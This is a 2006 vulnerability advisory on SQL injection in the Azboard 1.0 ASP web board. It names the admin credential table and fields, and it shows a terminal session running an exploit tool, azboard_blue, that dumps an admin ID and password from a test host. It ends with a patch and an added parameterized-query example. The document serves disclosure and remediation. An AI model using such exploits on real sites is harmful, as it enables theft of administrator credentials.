Title : Azboard <= 1.0 Multiple Sql Injections
Published : 2006.5.14
Author : x90c(정경주)@chollian.net/~jyj9782/
Link : http://user.chol.com/~jyj9782/sec/azboard_advisory.txt
0x01 Summary
Azboard is a web board written in ASP (Active Server Pages).
It has a SQL injection hole, so we can get the admin (bbs) ID,
password and so on. Let's start by looking at the code…
0x02 Codes
The above lines are vulnerable to SQL attack, as you can see. y0! ;)~
I found the fields ('admin_id', 'admin_pass') and table ('board_admin') in this file.
0x03 Exploit
[root@ebp exploits]# ls -al azboard_blue.c
-rw-r--r-- 1 root root 4771 5월 14 23:30 azboard_blue.c
[root@ebp exploits]# ls -al azboard_blue
-rwxr-xr-x 1 root root 17163 5월 14 23:30 azboard_blue
[root@ebp exploits]#
[root@ebp exploits]# make azboard_blue
cc azboard_blue.c -o azboard_blue
azboard_blue.c: In function `tu1':
azboard_blue.c:55: warning: assignment makes pointer from integer without a cast
azboard_blue.c:59: warning: assignment makes pointer from integer without a cast
azboard_blue.c:63: warning: assignment makes pointer from integer without a cast
azboard_blue.c:67: warning: assignment makes pointer from integer without a cast
[root@ebp exploits]# ./azboard_blue
azaboard 1.0 <= 0day :
$ ./azboard_blue <azboard URL> <cate>
~ [email protected]/~jyj9782
[root@ebp exploits]#
[root@ebp exploits]# ./azboard_blue http://192.168.0.5 testbbs
[ LANG=KOR admin id ] admin
[ LANG=KOR admin pass ] 1234
[root@ebp exploits]#
0x04 Patch
~/azboard/list.asp:
…
' VBScript has no backslash escapes: "\'" would only match the two characters \' together
if instr(search, "'") > 0 or instr(cate, "'") > 0 then
    Response.redirect "error.asp"
end if
…
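
An added example, not part of the original advisory or of Azboard's code: one way to harden the same list.asp lookup with an allowlist on cate and bound ADO parameters, so the query no longer depends on spotting a quote character. The open connection conn, the table board_list and the columns num, cate and title are assumed placeholders, because the advisory does not show the real query.

```vbscript
' Hypothetical hardened lookup for list.asp (added example, not Azboard code).
' Assumptions: "conn" is an already-open ADODB.Connection; the table
' "board_list" and its columns "num", "cate", "title" are placeholders.
Const adCmdText = 1
Const adParamInput = 1
Const adVarChar = 200

Dim cate, search, re, cmd, rs
cate = Request("cate")
search = Request("search")

' Allowlist the board identifier instead of searching for one bad character.
Set re = New RegExp
re.Pattern = "^[A-Za-z0-9_]{1,32}$"
If Not re.Test(cate) Then
    Response.Redirect "error.asp"
End If

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText

' The ? markers are bound in order; user input never becomes part of the SQL text.
cmd.CommandText = "SELECT num, title FROM board_list WHERE cate = ? AND title LIKE ?"
cmd.Parameters.Append cmd.CreateParameter("cate", adVarChar, adParamInput, 32, cate)
cmd.Parameters.Append cmd.CreateParameter("search", adVarChar, adParamInput, 102, _
    "%" & Left(search, 100) & "%")

Set rs = cmd.Execute
Do Until rs.EOF
    ' Encode on output so stored titles cannot inject markup into the page.
    Response.Write Server.HTMLEncode(rs("title") & "") & "<br>"
    rs.MoveNext
Loop
rs.Close
Set rs = Nothing
Set cmd = Nothing
```

The same pattern applies to any other page that reads board_admin: bind admin_id and admin_pass as parameters rather than concatenating them into the query string.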
Thanks for many 0p3n-H4ck3rz!